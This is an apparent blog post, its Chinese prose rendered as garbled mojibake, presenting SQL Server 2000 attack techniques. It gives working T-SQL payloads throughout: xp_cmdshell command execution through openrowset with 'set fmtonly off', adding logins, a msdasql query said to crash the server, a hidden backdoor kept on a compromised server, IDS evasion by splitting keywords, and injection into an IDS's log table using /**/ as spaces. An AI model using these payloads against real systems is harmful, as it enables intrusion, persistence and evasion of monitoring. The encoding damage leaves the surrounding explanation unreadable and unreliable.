ΪֻÄÜÈÃboxerÓû§²ÅÄÜʹÓõÄÃüÁî¡£

ͨ¹ýÉÏÃæ²Ù×÷ºó£¬Ò»°ãÓû§µÄµçÄÔ¾ÍÄÜ·ÀÓù´ó²¿·ÖÕë¶Ô¸öÈËÓû§µÄÒç³ö¹¥»÷ÁË¡£

Çë×¢ÒâÄÇЩÈÝÒ×±»ºöÂÔµÄSQL×¢Èë¼¼ÇÉ

ÏÂÃæÎÒҪ̸µ½Ò»Ð©SqlserverеÄBug£¬ËäÈ»±¾È˾­¹ý³¤Ê±¼äµÄŬÁ¦£¬µ±È»Ò²ÓеãÐÒÔ˵ijɷÖÔÚÄÚ£¬²ÅµÃÒÔ·¢ÏÖ£¬²»¸ÒÒ»¸öÈ˶ÀÏí£¬ÄóöÀ´Çë´ó¼Ò¼ø±ð¡£

1£®¹ØÓÚOpenrowsetºÍOpendatasource

¿ÉÄÜÕâ¸ö¼¼ÇÉÔçÓÐÈËÒѾ­»áÁË£¬¾ÍÊÇÀûÓÃopenrowset·¢Ëͱ¾µØÃüÁͨ³£ÎÒÃǵÄÓ÷¨ÊÇ£¨°üÀ¨MSDNµÄÁÐ×Ó£©ÈçÏ£º

select * from openrowset('sqloledb','myserver';'sa';'','select * from

table')

¿É¼û£¨¼´Ê¹´Ó×ÖÃæÒâÒåÉÏ¿´)openrowsetÖ»ÊÇ×÷Ϊһ¸ö¿ì½ÝµÄÔ¶³ÌÊý¾Ý¿â·ÃÎÊ£¬Ëü±ØÐë¸úÔÚselectºóÃæ£¬Ò²¾ÍÊÇ˵ÐèÒª·µ»ØÒ»¸örecordset ¡£

ÄÇôÎÒÃÇÄܲ»ÄÜÀûÓÃËüµ÷ÓÃxp_cmdshellÄØ£¿´ð°¸Êǿ϶¨µÄ£¡

select * from openrowset('sqloledb','server';'sa';'','set fmtonly off

exec master.dbo.xp_cmdshel l ''dir c:\''')

±ØÐë¼ÓÉÏset fmtonly offÓÃÀ´ÆÁ±ÎĬÈϵÄÖ»·µ»ØÁÐÐÅÏ¢µÄÉèÖã¬ÕâÑùxp_cmdshell·µ»ØµÄoutput¼¯ºÏ¾Í»áÌá½»¸øÇ°ÃæµÄselectÏÔʾ£¬Èç¹û²ÉÓÃĬÈÏÉèÖ㬻᷵»Ø¿Õ¼¯ºÏµ¼ÖÂselect³ö´í£¬ÃüÁîÒ²¾ÍÎÞ·¨Ö´ÐÐÁË¡£

ÄÇôÈç¹ûÎÒÃÇÒªµ÷ÓÃsp_addloginÄØ£¬Ëû²»»áÏñxp_cmdshell·µ»ØÈκμ¯ºÏµÄ£¬ÎÒÃǾͲ»ÄÜÔÙÒÀ¿¿fmtonlyÉèÖÃÁË£¬¿ÉÒÔÈçϲÙ×÷

select * from openrowset('sqloledb','server';'sa';'','select ''OK!''

exec master.dbo.sp_addlogin Hectic')

ÕâÑù£¬ÃüÁîÖÁÉٻ᷵»Øselect OK!'µÄ¼¯ºÏ£¬ÄãµÄ»úÆ÷ÉÌ»áÏÔʾOK!£¬Í¬Ê±¶Ô·½µÄÊý¾Ý¿âÄÚÒ²»áÔö¼ÓÒ»¸öHecticµÄÕ˺ţ¬Ò²¾ÍÊÇ˵£¬ÎÒÃÇÀûÓÃ

select 'OK!'µÄ·µ»Ø¼¯ºÏÆÛÆ­Á˱¾µØµÄselectÇëÇó£¬ÊÇÃüÁîÄܹ»Õý³£Ö´ÐУ¬Í¨Àísp_addsrvrolememberºÍopendatasourceÒ²¿ÉÒÔÈç´Ë²Ù×÷£¡ÖÁÓÚÕâ¸ö·½·¨ÕæÕýµÄÓô¦£¬´ó¼ÒÂýÂýÏë°É¡£

2£®¹ØÓÚMsdasqlÁ½´ÎÇëÇóµÄÎÊÌâ

²»ÖªµÀ´ó¼ÒÓÐûÓÐÊÔ¹ýÓÃmsdasqlÁ¬½ÓÔ¶³ÌÊý¾Ý¿â£¬µ±È»Õâ¸öapi±ØÐëÊÇsqlserverµÄ¹ÜÀíÔ±²Å¿ÉÒÔµ÷Óã¬ÄÇôÈçÏ£º

select * from openrowset('msdasql','driver={sql

server};server=server;address=server,1433;uid=sa;pwd=;database=master;network=dbmssocn','s

elect * from table1 select * from table2')

µ±table1ºÍtable2µÄ×Ö¶ÎÊýÄ¿²»Ïàͬʱ£¬Äã»á·¢ÏÖ¶Ô·½µÄsqlserver±ÀÀ£ÁË£¬Á¬±¾µØÁ¬½Ó¶¼»áʧ°Ü£¬¶øÏµÍ³×ÊÔ´Õ¼ÓÃÒ»ÇÐÕý³££¬ÓÃpskillɱËÀ sqlserver½ø³Ìºó£¬Èç¹û²»ÖØÆô»úÆ÷£¬sqlserverҪôÎÞ·¨Õý³£Æô¶¯£¬ÒªÃ´Ê±³£³öÏÖ·Ç·¨²Ù×÷£¬ÎÒÒ²Ö»ÊÇÅöÇÉÕÒµ½Õâ¸öbugµÄ£¬¾ßÌåÔ­ÒòÎÒ»¹Ã»ÓÐÃþ͸£¬¶øÇ񼆮æ¹ÖµÄÊÇÕâ¸öÏÖÏóÖ»³öÏÖÔÚmsdasqlÉÏ£¬sqloledb¾ÍûÓÐÕâ¸öÎÊÌ⣬¿´À´ÎÊÌâ²»ÊÇÔÚÓÚÇëÇ󼯺ÏÊýÄ¿ºÍ·µ»Ø¼¯ºÏÊýÄ¿²»Æ¥ÅäÉÏ£¬Ó¦¸Ã»¹ÊÇmsdasql±¾ÉíµÄÎÊÌ⣬¾ßÌåÔ­Òò£¬´ó¼ÒÒ»ÆðÂýÂýÑо¿°É¡£

3£®¿ÉŵĺóÃÅ

ÒÔǰÔÚÍøÉÏ¿´µ½ÓÐÈË˵ÔÚ sqlserverÉÏÁôºóÃÅ¿ÉÒÔͨ¹ýÌí¼Ótriger¡¢jobs»ò¸Äдsp_addloginºÍsp_addsrvrolemember×öµ½£¬ÕâЩ·½·¨µ±È»¿ÉÐУ¬µ«ÊǺÜÈÝÒ׻ᱻ·¢ÏÖ¡£²»ÖªµÀ´ó¼ÒÓÐûÓÐÏë¹ýsqloledbµÄ±¾µØÁ¬½ÓÓ³Éä¡£ºÇºÇ£¬±ÈÈçÄãÔÚ¶Ô·½µÄsqlserverÉÏÓÃsqlserverµÄ¹ÜÀíÔ±Õ˺ÅÖ´ÐÐÈçϵÄÃüÁ

select * from openrowset('sqloledb','trusted_connection=yes;data

source=Hectic','set fmtonly off exec master..xp_cmdshell ''dir c:\''')

ÕâÑùÔÚ¶Ô·½µÄ sqlserverÉϽ¨Á¢ÁËÒ»¸öÃûΪHecticµÄ±¾µØÁ¬½ÓÓ³É䣬ֻҪsqlserver²»ÖØÆô£¬Õâ¸öÓ³Éä»áÒ»Ö±´æÔÚÏÂÈ¥£¬ÖÁÉÙÎÒÏÖÔÚ»¹²»ÖªµÀÈçºÎ·¢ÏÖ±ðÈË·ÅÖõÄÁ¬½ÓÓ³É䣬ºÃÁË£¬ÒÔÉϵÄÃüÁîÔËÐйýºó£¬Äã»á·¢ÏÖÄÄÅÂÊÇsqlserverûÓÐÈκÎȨÏÞµÄguestÓû§£¬ÔËÐÐÒÔÉÏÕâÌõÃüÁîÒ²Ò»ÑùÄÜͨ¹ý£¡¶øÇÒȨÏÞÊÇ localsystem£¡£¨Ä¬Èϰ²×°£©ºÇºÇ£¡Õâ¸ö·½·¨¿ÉÒÔÓÃÀ´ÔÚÒÔ±»ÈëÇÖ¹ý»ñµÃ¹ÜÀíԱȨÏÞµÄsqlserverÉÏÁôÏÂÒ»¸öºóÃÅÁË¡£ÒÔÉϵķ½·¨ÔÚ sqlserver2000 sqlserver2000SP1ÉÏͨ¹ý£¡

ÁíÍ⻹ÓÐÒ»¸ö²Â²â£¬²»ÖªµÀ´ó¼ÒÓÐûÓÐ×¢Òâ¹ýwindowsĬÈϸ½´øµÄÁ½¸ödsn£¬Ò»¸öÊÇlocalserverÒ»¸öÊÇmsqi£¬ÕâÁ½¸öÔÚ½¨Á¢µÄʱºòÊDZ¾µØ¹ÜÀíÔ±Õ˺ÅÁ¬½ÓsqlserverµÄ£¬Èç¹û¶Ô·½µÄ sqlserverÊÇͨ¹ý×Ô¶¨ÒåµÄpower userÆô¶¯£¬ÄÇôsaµÄȨÏ޾ͺÍpower userÒ»Ñù£¬ºÜÄÑÓÐËù´ó×÷Ϊ£¬µ«ÊÇÎÒÃÇͨ¹ýÈçϵÄÃüÁ

select * from openrowset

('msdasql','dsn=locaserver;trusted_connection=yes','set fmtonly off exec

master..xp_cmdshell ''dir c:\''')

Ó¦¸Ã¿ÉÒÔÀûÓÃlocalserverµÄ¹ÜÀíÔ±Õ˺ÅÁ¬½Ó±¾µØsqlserverÈ»ºóÔÙÒÔÕâ¸öÕ˺ŵÄȨÏÞÖ´Ðб¾µØÃüÁîÁË£¬ÕâÊǺóÎÒÏëÓ¦¸ÃÄÜÍ»ÆÆsaÄǸöpower userȨÏÞÁË¡£ÏÖÔÚµÄÎÊÌâÊÇsqloledbÎÞ·¨µ÷ÓÃdsnÁ¬½Ó£¬¶ømsdasql·Ç¹ÜÀíÔ±²»Èõ÷Óã¬ËùÒÔÎÒÏÖÔÚÕýÔÚѰÕÒguestµ÷ÓÃmsdasql µÄ·½·¨¡£

Èç¹ûÓÐÈËÖªµÀÕâ¸öbugÈçºÎÍ»ÆÆ£¬»òÓÐеÄÏë·¨£¬ÎÒÃÇ¿ÉÒÔÒ»ÆðÌÖÂÛһϣ¬Õâ¸ö·¢·ÅÈç¹ûÄܳɹ¦±»guestÀûÓ㬽«»áÊÇÒ»¸öºÜÑÏÖØµÄ°²È«Â©¶´¡£ÒòΪÎÒÃÇÇ°ÃæÌáµ½µÄÈκÎsqlÓï¾ä¶¼¿ÉÒÔÌá½»¸ø¶Ô·½µÄaspÈ¥°ïÎÒÃÇÖ´ÐС£

4£®ÀûÓÃT-sqlÆ­¹ýIds»ò¹¥»÷Ids

ÏÖÔÚµÄidsÒѾ­±äµÃÔ½À´Ô½´ÏÃ÷ÁË¡£ÓеÄids¼ÓÈëÁËxp_cmdshell sp_addlogin µÄ¼àÊÓ£¬µ«ÊDZϾ¹È˹¤ÖÇÄÜûÓгöÏֵĽñÌ죬ÕâÖÖ¼àÊÓ×ÜÊÇÓÐÖÖÆ­È˵ĸоõ¡£

ÏÈ˵˵ÆÛÆ­Ids

ids¼ÈÈ»¼àÊÓxp_cmdshell¹Ø¼ü×Ö£¬ÄÇôÎÒÃÇ¿ÉÒÔÕâô×ö£º

declare @a sysname set @a="xp_" "cmdshell" exec @a 'dir c:\'

Õâ¸ö´úÂëÏàÐÅ´ó¼Ò¶¼ÄÜ¿´Ã÷°×£¬»¹ÓÐxp_cmdshell×÷Ϊһ¸östore procedureÔÚmaster¿âÄÚÓÐÒ»¸öidºÅ£¬¹Ì¶¨µÄ£¬ÎÒÃÇÒ²¿ÉÒÔÕâô×ö£º

¼ÙÉèÕâ¸öid=988456

declare @a sysname select @a=name from sysobjects where id=988456

exec @a 'dir c:\'

µ±È»Ò²¿ÉÒÔ£º

declare @a sysname select @a=name from sysobjects where id=988455 1

exec @a 'dir c:\'

ÕâÖÖ×ö·¨ÅÅÁÐ×éºÏ£¬ids¸ù±¾²»¿ÉÄÜ×öµÄµ½ÍêÈ«¼àÊÓ¡£Í¬Àí£¬sp_addloginÒ²¿ÉÒÔÕâô×ö¡£

ÔÙ˵˵¹¥»÷Ids

ÒòΪidsÊý¾ÝÁ¿ºÜ´ó£¬ÈÕÖÁͨ³£±¸·Ýµ½³£¹æÊý¾Ý¿â£¬±ÈÈçsql server¡£

Èç¹ûÓùÅÀϵÄrecordset.addnew×ö·¨£¬»áÑÏÖØÓ°ÏìidsµÄÐÔÄÜ£¬ÒòΪͨ¹ýado×öt-sqlÇëÇ󣬲»µ«Ð§Âʸߣ¬¶øÇÒÓÐÒ»²¿·Ö¹¤×÷¿ÉÒÔ½»¸øsql server È¥×ö£¬Í¨³£³ÌÐò»áÕâôд£º

insert table values ('ÈÕÖÁÄÚÈÝ'£¬...)

ÄÇôÎÒÃÇÏëÏë¿´£¬Èç¹ûÓà temp') exec xp_cmdshell 'dir c:\' -- Ìá½»ºó»á±ä³É£º

insert table values ('ÈÕÖÁÄÚÈÝ'....'temp') exec xp_cmdshell 'dir

c:\' -- ')

ÕâÑù£¬xp_cmdshell¾Í¿ÉÒÔÔÚidsµÄÊý¾Ý¿âÔËÐÐÁË¡£µ±È»idsÊÇÒ»¸öÐá̾Æ÷£¬Ëû»á×¥ËùÓеı¨£¬¶øä¯ÀÀÆ÷Ìá½»µÄʱºò»á°Ñ¿Õ¸ñ±ä³É ¡£Òò´Ë£¬ »á±»Ìá½»µ½sql server£¬ÕâÑùÄãµÄÃüÁî¾ÍÎÞ·¨Ö´ÐÐÁË¡£ ΨһµÄ°ì·¨¾ÍÊÇ£º

insert/**/table/**/values('ÈÕÖÁÄÚÈÝ'....'temp')/**/exec/**/xp_cmdshell/**/'dir c:\'/**/-- ')

ÓÃ/**/´úÌæ¿Õ¸ñ×ö¼ä¸ô·û£¬ÕâÑùÄãµÄt-sql²ÅÄÜÔÚidsµÄÊý¾Ý¿âÄÚÖ´ÐС£µ±È»Ò²¿ÉÒÔÓÃÆäËûÓï¾ä£¬¿ÉÒÔÆÆ»µ£¬±¸·ÝidsµÄÊý¾Ý¿âµ½ÄãµÄ¹²ÏíĿ¼£¬ºÇºÇ¡£

ÆäʵÕâÖÖ·½·¨µÄÔ­ÀíºÍ¹¥»÷aspÊÇÒ»ÑùµÄ£¬Ö»Êǰѿոñ±ä³ÉÁË/**/ ¡£±¾À´aspÊÇselectÓï¾ä£¬ÄÇôÓÃ'¾Í¿ÉÒÔÆÁ±Î¡£ÏÖÔÚidsÓÃinsertÓï¾ä£¬ÄÇôÓÃ')ÆÁ±Î¡£

ºÃÁË£¬ÆäËûºÜ¶àеÄÈëÇÖÓï¾ä´ó¼Ò¿ÉÒÔ×Ô¼ºÂýÂýÏ룬×îºÃµÄ²âÊÔ¹¤¾ß¾ÍÊÇquery analyzerÁË¡£
Posted by glen in [ÍøÂç¼¼Êõ] | ÆÀÂÛ:6 | ×Üä¯ÀÀ:1319 | [´òÓ¡È«ÎÄ]

¹Ø¼ü×Ö:
¹Ø¼ü×Ö: ÍøÂ簲ȫÈëÃÅ֪ʶ16ÎÊ´ð,²©Ö¾,soft,glen'blog,blog,weblog,blog,qzhiwu@msn.com
ÒýÓÃ [0]
±¾ÎÄÎÞTrackback
Ìí¼ÓÆÀÂÛ
êdzÆ: * ÃÜÂë:
ÐÅÏä: ͬʱע²áÕâ¸öêdzÆ
Ö÷Ò³: http://¿ªÍ·
£Ñ£Ñ:
¡¡ *
ÁªÏµÎÒÃÇ |  
¡¡
Copyright © 2006-2008 DoMsN All Rights Reserved.
ÔÁICP±¸05141795ºÅ